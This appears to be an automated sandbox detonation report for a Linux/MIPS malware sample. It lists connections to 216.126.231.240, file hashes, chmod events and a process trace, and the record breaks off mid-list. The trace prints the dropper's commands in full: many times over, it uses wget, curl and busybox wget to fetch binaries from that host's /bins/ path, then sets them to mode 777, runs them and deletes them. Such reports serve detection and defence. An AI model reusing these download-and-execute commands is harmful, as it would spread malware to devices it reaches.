| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/799-1-0xb677e000-0xb678f044-memory.dmp
memory/800-2-0xb6750000-0xb6761044-memory.dmp
memory/800-3-0xb66b6000-0xb66c7044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 02:59
Reported
2024-11-20 03:02
Platform
debian9-mipsbe-20240611-en
Max time kernel
108s
Max time network
138s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
